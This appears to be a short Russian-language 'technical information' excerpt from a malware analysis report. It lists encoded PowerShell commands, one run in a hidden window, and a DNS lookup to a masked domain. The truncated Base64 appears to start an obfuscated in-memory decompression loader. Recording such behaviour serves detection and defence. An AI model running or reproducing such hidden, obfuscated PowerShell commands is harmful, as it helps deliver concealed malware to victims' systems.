Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAoACAATgBlAHcALQBPAGIAagBFAGMAdAAgAFMAeQBzAFQAZQBtAC4AaQBPAC4AQwBPAG0AUABSAEUAcwBzAEkATwBuAC4AZABlAEYAbABhAFQARQBTAHQAcgBlAGEAbQAoACAAWwBTAFkAUwB0AEUATQAuAEkATwAuAE0AZQBtAG8AUgBZAFMAdAByAE...
- DNS ASK zz###wnewq.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAoACAATgBlAHcALQBPAGIAagBFAGMAdAAgAFMAeQBzAFQAZQBtAC4AaQBPAC4AQwBPAG0AUABSAEUAcwBzAEkATwBuAC4AZABlAEYAbABhAFQARQBTAHQAcgBlAGEAbQAoACAAWwBTAFkAUwB0AEUATQAuAEkATwAuAE0AZQBtAG8AUgBZAFMAdAByAE...' (со скрытым окном)